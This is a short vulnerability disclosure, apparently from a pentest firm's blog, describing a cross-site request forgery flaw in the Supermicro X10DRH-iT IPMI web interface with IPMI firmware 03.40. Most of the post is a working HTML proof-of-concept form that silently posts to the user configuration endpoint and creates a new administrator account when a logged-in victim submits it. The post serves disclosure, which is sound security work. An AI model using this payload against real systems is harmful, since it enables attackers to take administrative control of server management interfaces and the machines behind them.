• metin yunus kandemir

Supermicro IPMI WEBGUI Cross-Site Request Forgery

The Supermicro X10DRH-iT motherboards with Bios 2.0a and IPMI firmware 03.40 web interface allows remote attackers to exploit cross-site request forgery vulnerability so that add new admin users.

There isn't a token parameter in request that adds new user with admin privileges.


Assuming that victim user has a authorized session on Supermicro WEBGUI and visits attacker's web page containing the following HTML :


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
      <input type="hidden" name="username" value="JOKER" />
      <input type="hidden" name="original&#95;username" value="2" />
      <input type="hidden" name="password" value="onebadday" />
      <input type="hidden" name="new&#95;privilege" value="4" />
      <input type="submit" value="submit request" />
    </form>
  </body>
</html>

If the victim user clicks "submit request" button, attacker's page will trigger an http request and add new admin user to Supermicro WEBGUI.


Proof of Concept Video:








0 views
Logo

Total

Pentest

Alerting today for a better tomorrow.